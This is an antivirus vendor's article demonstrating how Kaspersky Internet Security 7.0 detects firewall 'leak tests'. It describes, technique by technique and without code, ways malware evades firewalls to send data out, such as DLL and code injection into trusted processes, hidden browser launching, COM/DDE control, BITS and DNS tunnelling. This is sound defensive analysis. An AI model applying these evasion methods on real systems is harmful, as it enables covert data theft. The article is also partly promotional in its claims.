|
|
Controlling outgoing network traffic with Kaspersky Internet Security 7.0Table of ContentsINTRODUCTION CONCLUSIONIntroductionOne of the main ways in which personal firewalls are evolving is by combining firewall technologies per se (i.e., analysis of the network activity of applications) with heuristic analysis of application activity and application integrity control. One of the reasons for this is the development of technologies for evading firewall protection (i.e., leaks), which cannot be blocked without heuristic analysis of application activity. The purpose of this article is to demonstrate the leak prevention capabilities of Kaspersky Internet Security 7.0 (KIS 7.0). To do this, we used existing leak tests (for more information about leaks and the leak test classification, please see the article Using leak tests to evaluate firewall effectiveness at http://www.viruslist.com/en/analysis?pubid=204791977). One of the most important issues relating to any test is the settings used when testing a product. With Kaspersky Internet Security 7.0, the user can choose between two protection modes basic and interactive when configuring the product using the wizard launched after product installation. In the basic mode, the product asks the user significantly fewer questions than in the interactive mode, providing a slightly lower level of protection. For most users, this mode offers a reasonable balance between security and convenience. Advanced users can select the interactive protection mode, which offers maximum protection, provided that the user responds reasonably to the product’s prompts and alerts. In this article, we demonstrate how Kaspersky Internet Security 7.0 responds to leak tests in the interactive protection mode. It may be the firewall that responds to leaks, alerting the user to applications’ attempts to initiate network activity, or the proactive defense module may respond, alerting the user to suspicious local activity of applications. Clicking the Block or Deny button in any alert window will stop the leak test and prevent an information leak. The table below summarizes the existing leak tests, which are grouped according to the methods used to evade firewall protection.
Note that some leak tests use several evasion mechanisms. An example is CPILSuite [2], which uses the injection of code into a trusted process (DLL injection) in order to launch the browser with command line parameters on behalf of that process (Launching). In such cases, leak tests are categorized according to the first evasion mechanism used. Below, we discuss leak tests in the following order: first, all the leak tests in the Substitution category, from Runner to Coat, then leak tests in the Launching category, etc. The last leak test discussed is DNStester. In the interactive mode, Kaspersky Internet Security 7.0 successfully passes all the existing leak tests. For each test, we show the alert window displayed by Kaspersky Internet Security 7.0. SubstitutionReplacing the executable file of a trusted application on the hard drive or substituting the data of a trusted process in RAM for that of an unknown process. The idea behind this method is to ‘convince’ the firewall that the network activity was initiated by a trusted process. In all three tests in the Substitution category, the Kaspersky Internet Security 7.0 firewall alerts the user to the outbound network activity of the application used in the leak test. Test RunnerThe leak test attempts to find the default browser and replace its executable file on the hard drive with its own copy. Kaspersky Internet Security 7.0 warns the user that the browser’s executable file has changed:
After this, even if the user allowed the file to be replaced, Kaspersky Internet Security 7.0 prompts the user to allow or block network activity for the leak test’s application:
Test LeakTestThis was one of the first leak tests to appear. It is based on the file name of an unknown application being replaced with the file name of a trusted application. The program changes its name to that of a known network program and attempts to establish a TCP connection with grc.com:80 (the web server of Gibson Research Corporation). The Kaspersky Internet Security 7.0 firewall alerts the user to the outbound network activity of the leak test application:
Coat leak testAfter loading into RAM, the leak test replaces data in its process with data identical to that of the default Internet browser and attempts to establish a network connection. The Kaspersky Internet Security 7.0 firewall warns the user of the leak test application’s outbound network activity:
After clicking on the Details… link, the user can view additional information about the connection that the leak test application is trying to establish, including the remote node address, as well as the full path to the file of the process attempting to establish the connection:
LaunchingLaunching a trusted application with command line parameters. This method is based on the fact that most browsers accept the address of the web page to be opened as a command line parameter. If the web page includes a server side script (e.g., cgi), the address line can also include parameters that will be used by the script as input. These parameters can include confidential information, e.g., data stolen by a spyware program. Importantly, all network activity is generated by the browser as usual, so it will always be allowed in accordance with the firewall rules. To prevent the user from noticing the browser window, the browser is usually launched in hidden mode (Ghost, TooLeaky, Wallbreaker [1]). Malicious code can also launch the browser using other processes rather than launching it directly. When launching any of the leak tests described below in this section, Kaspersky Internet Security 7.0 regards the activity of the leak test’s application as suspicious and prompts the user for action. Additional information that the user can view includes the path to the browser file being launched and the command line parameters used. In the case of a genuine malicious application, this window would show the information that the application is attempting to send to a cybercriminal. Ghost leak testThis leak test attempts to deceive protection by restarting its own process in order to change its PID, i.e., process identifier. Then it launches the browser in hidden mode with command line parameters.
TooLeaky leak testThis leak test attempts to launch a browser in hidden mode with command line parameters.
Wallbreaker leakt testWallbreaker leak test No1This leak test attempts to launch a browser in hidden mode with command line parameters.
Wallbreaker leakt test No 2This leak test attempts to launch an Internet browser using the Windows shell process (explorer.exe).
Wallbreaker leak test No 3This leak test attempts to launch the browser using the Windows shell process (explorer.exe), which itself is launched using the command interpreter cmd.exe.
Test Wallbreaker No 4This leak test attempts to launch the browser using the Windows task scheduling mechanism. In this case, the processes are launched in the following sequence: at.exe — svchost.exe — cmd.exe — explorer.exe — iexplore.exe.
DLL injectionInjecting a dynamic link library into the address space of a trusted process. This method loads a malicious program’s dynamic link library into the address space of a trusted process. In response to an attempt to load a dynamic link library, the proactive defense module of Kaspersky Internet Security 7.0 prompts the user for action, since such behavior is characteristic of many malicious programs. After clicking on the Details… link, the user can view the full path to the module being injected and information about the module. CPILSuite leak test No. 2The leak test attempts to inject a dynamic link library (cpil2.dll) into the address space of a trusted process in this case, the Windows shell (explorer.exe) by installing a global hook. After this, the browser is launched with command line parameters on behalf of the trusted process (see previous section). After clicking on the Details… link, a window displaying additional information opens. It can be inferred from the information provided that the DLL is on the hard drive next to the leak test’s executable file. The parameters of the dynamic link library do not include a description or version information. Being located away from standard system paths and the absence of information about the application (name, version, vendor) are characteristic of some malicious programs.
When the browser is launched with command line parameters, Kaspersky Internet Security 7.0 displays a user alert:
CPILSuite leak test No. 3This leak test attempts to inject a dynamic link library (cpil3.dll) into the address space of a trusted process in this case, the Windows shell (explorer.exe) by installing a global hook. Then it attempts to take control of a browser on behalf of the trusted process using a program interface provided by the browser (see section 5). As in the previous test, an attempt to load a dynamic link library into all processes will result in an alert being displayed by the proactive defense module of Kaspersky Internet Security 7.0:
If the user allows the DLL to be loaded by selecting the relevant option in the alert window, the proactive defense module of Kaspersky Internet Security 7.0 will open one more alert window warning the user that the application explorer.exe is attempting to control the browser programmatically. Such behavior is not typical of the Windows shell process, which means that the alert is probably the result of an infection. To determine which application is attempting to act on behalf of a trusted process, the user should search the proactive defense module’s log for records related to code injection, DLL injection and other similar events.
FireHole leak testThis leak test launches an Internet browser and attempts to inject a dynamic link library into the browser’s address space by installing a global hook. As in previous tests, an attempt to load a dynamic link library into all processes causes the proactive defense module of Kaspersky Internet Security 7.0 to display a user alert window.
Jumper leak testThe leak test attempts to load its dynamic link library into the address space of trusted processes. To do this, it adds its dynamic link library to the list of DLLs automatically loaded by the system into each new process. The information is written to the AppInit_DLLs registry key. The registry guard feature in the proactive defense module of Kaspersky Internet Security 7.0 warns the user if new libraries are being added to this registry key and recommends blocking access, unless the user does want the DLL to be automatically loaded by the system into each new process.
Even if the user did allow the DLL to be loaded into all processes, the application integrity module of Kaspersky Internet Security 7.0 will warn the user of the attempt to load a new module into the address space of a trusted application’s process after the trusted application is launched.
pcAudit leak testThe leak test attempts to inject a dynamic link library into the address space of trusted processes by installing a global hook. Then it attempts to access the Internet on behalf of a trusted process. As with other leak tests, an attempt to load a dynamic link library into all processes will cause the proactive defense module of Kaspersky Internet Security 7.0 to display an alert window.
pcAudit2 leak testThis leak test is similar to the pcAudit test. It attempts to inject a dynamic link library into the address space of trusted processes by installing a global hook. Then it attempts to access the Internet on behalf of a trusted process. An attempt to load a dynamic link library into all processes causes the proactive defense module of Kaspersky Internet Security 7.0 to display an alert window. After clicking on the Details… link, an additional information window is displayed. In this window, it is important to note that no information about the dynamic link library is provided. This is typical of malicious (and test) applications. The History of process activity tab is also of interest, since it shows all file and registry operations performed by the application. It is easy to see that the library being injected into all processes (baqsesrv.dll) was initially not present in the system and was created by the leak test application itself. Many malicious programs operate in this way, ‘extracting’ additional modules from their resources. According to Kaspersky Lab classification, such applications are categorized as Trojan-Droppers.
Code injectionInjecting code into the address space of a trusted process without using a dynamic link library. This method injects executable code into the address space of a trusted process. After injection, this code can initiate any network activity, since the firewall will regard it as activity by the trusted application. Unlike the DLL injection method, the legitimacy of this operation is doubtful, although documented methods for injecting code into other applications’ processes do exist. Such code injection is sometimes used by legitimate programs (e.g., debuggers), but is mostly used by malicious software. There are numerous methods for injecting code into other applications’ processes. The processes most often attacked are those of Internet browsers, the operating system shell and the svchost.exe process, which is the main process for Windows services loaded from dynamic link libraries. When any of the leak tests described below attempts to patch the memory of another process, the proactive defense module of Kaspersky Internet Security 7.0 displays an alert window, because such behavior is typical of many malicious programs. After clicking on the Details… link, the user can view the name of the process into which code is being injected. AWFT leak testAWFT leak test No. 1This leak test launches an Internet browser and attempts to patch its process’s memory.
AWFT leak test No. 2This leak test launches an Internet browser and attempts to create a so-called remote execution thread controlled by the leak test's process.
AWFT leak test No. 3This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe).
AWFT leak test No. 4This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe) in order to use the thread to launch the Internet browser and patch its memory prior to execution.
AWFT leak test No. 5This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe) in order to use the thread to launch a network application and patch its memory prior to execution. Before this, the leak test performs a heuristic search for suitable network applications installed on the computer.
AWFT leak test No. 6This leak test performs a heuristic search for network applications installed on the computer and prompts the user to select one of them. Then it attempts to create a remote execution thread in the process selected.
Unlike other leak tests, AWFT awards points for passing each of the six variants of the test and then calculates a firewall’s score based on the points awarded. Kaspersky Internet Security 7.0 scores 10 points out of a maximum of 10:
CopyCat leak testThis leak test uses a special Windows API function, SetThreadContext, to gain control over a thread in the trusted process of the Internet browser.
CPIL leak testThe leak test attempts to patch the memory of the Windows shell process (explorer.exe) by loading its own dynamic link library into it. Then it launches an Internet browser on behalf of the trusted process and transfers data to a remote server.
CPILSuite leak test No. 1As in the case of CLIP, this leak test attempts to patch the memory of the Windows shell process, explorer.exe, in order to launch an Internet browser on behalf of the trusted process and send data to a remote server. But before this, it tries to protect this operation from being detected by the firewall by removing its hooks. The leak test does this by accessing the physical memory of the computer. Kaspersky Internet Security 7.0 alerts the user to the leak test application’s suspicious actions, i.e., its attempts to access the physical memory, inject code into the explorer.exe process and launch the browser with command line parameters.
DNStest leak testThis leak test launches the svchost.exe process (the main process for Windows services loaded from dynamic link libraries) and attempts to patch its memory. Successfully performing this operation would allow the leak test to send data over the Internet on behalf of the svchost.exe process, since any firewall usually includes several permission rules for this process (e.g., rules for the DNS service). As with other leak tests, Kaspersky Internet Security 7.0 responds to attempts to inject code into other processes with a standard user alert window. Here, the Child processes tab of the Details… window is of interest. It shows all processes launched by the process to the suspicious behavior of which Kaspersky Internet Security 7.0 is alerting the user. The presence of system processes on the list (svchost.exe in this case) is very suspicious and indicates that the parent process is likely to be malicious.
Thermite leak testThis leak test attempts to find an Internet browser process that is running, injects its code into that process and creates a remote execution thread in it. This thread is then controlled by the leak test’s process. A socket connection is created in the thread, via which data is sent to a remote server.
Browser servicesUsing program interfaces to control an Internet browser. This method exploits various mechanisms in Windows that are designed to facilitate interaction between the processes of different components / applications. Breakout leak testThis leak test sends two Windows messages to an Internet browser’s window: the first changes the value in the address bar and the second presses the browser’s Go button (causing the browser to go to the address specified in the address bar). Kaspersky Internet Security 7.0 regards such activity by the application as an attempt to send data using a trusted process and displays an alert window. After clicking on the Details… link, the user can view the path to the process’s file and the address of the website to which data is being sent, as well as view the data that the leak test is trying to send (in this leak test, the string of data being sent is empty, but in other leak tests, e.g., PCFlank, the data that the leak test is trying to send can be seen).
PCFlank leak testThis leak test uses an Internet browser as a COM automation server in an attempt to send data to a remote server without the user’s knowledge. Kaspersky Internet Security 7.0 regards this activity as an attempt to send data using a trusted process and displays an alert window. After clicking on the Details… link, the user can view the path to the process’s file, the address of the website to which data is being sent and the data being sent.
Surfer leak testThis leak test uses another program interface provided by Internet Explorer – the DDE (Dynamic Data Exchange) mechanism. The leak test creates a hidden desktop and launches an Internet browser process with command-line parameters inside it, controlling it by sending it DDE commands. Kaspersky Internet Security 7.0 regards this activity as suspicious and displays an alert window to warn the user that the leak test’s application, surfer.exe, is attempting to control the browser programmatically. Additionally, Kaspersky Internet Security 7.0 displays an alert to warn the user of an attempt to launch the browser with command line parameters.
ZAbypass leak testThis leak test uses dynamic data exchange (DDE) mechanisms to control Internet Explorer and launch it with command line parameters. Kaspersky Internet Security 7.0 displays an alert warning the user of an attempt to launch the browser with command line parameters. The parameters used can be viewed in the Details… window.
System servicesUsing program interfaces provided by system services. This method is similar to the method discussed above. The difference is that the program interfaces that are used are provided by operating system components rather than an Internet browser. BITSTester leak test<This leak test uses BITS (Background Intelligent Transfer Service), an intelligent file downloading service available in the latest Windows versions, which can be used to download files from a specified server on the Internet. This service is used by the operating system for downloading updates of its modules (Windows Update), which means that permission rules are usually configured for it. Kaspersky Internet Security 7.0 categorizes the use of the BITS service as hidden data sending using a trusted application and displays an alert window. Upon clicking on the Details… link, the user can view the path to the process’s file, the address of the website to which data is being sent and view the data being sent (no data is sent by this leak test).
Breakout2 leak testThis leak test creates a file named dingens.htm and uses the interface for managing Windows desktop elements and wallpapers to set this html page as the Windows wallpaper. The html page includes an element that links to an external page, http://www.dingens.org/breakout.html, resulting in this page being loaded when the new desktop wallpaper is activated. An attempt to set an html page as the Windows wallpaper results in Kaspersky Internet Security 7.0 alerting the user to an attempt to launch the browser with command line parameters.
DNStester leak testThis leak test uses the DNS service (Windows DNS API functions) to send data to a remote computer. This service can be used for attacks based on recursive DNS queries to an Internet domain name server. Kaspersky Internet Security 7.0 detects an attempt to query a DNS server and alerts the user.
ConclusionAccording to a ranking available at http://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php, Kaspersky Internet Security 7.0.0.125 provides very-good protection from leaks, demonstrating much higher results than other big players in the IT security industry. Unfortunately, the existing set of leak tests is no longer optimal for evaluating the true level of protection provided by different firewalls from leaks: a number of leak tests are based on the same leak mechanism, while some leak mechanisms are not implemented in any leak tests. Therefore, we welcome the decision of the www.matousec.com team to develop a new set of leak tests from scratch and are prepared to work together with the Matousec group in order to design a truly effective set of leak tests. P.S. When this article was being prepared for publication, David Matoušek launched a new project, Firewall Challenge, which supersedes the Window Personal Firewall Analysis project. The new project tests personal firewalls, integrated security systems and other similar products. Unlike the previous project, Firewall Challenge includes not only leak tests, but also tests that analyze such security product characteristics as stability, self-protection and the ability to block security system evasion methods that do not target specific aspects of security system implementation. Although a number of important aspects of security software are not covered by the new project, we regard the launch of Firewall Challenge as a significant step forward in developing methodologies for testing and evaluating personal firewalls and integrated security products. |
|
All rights reserved. Industry-leading Antivirus Software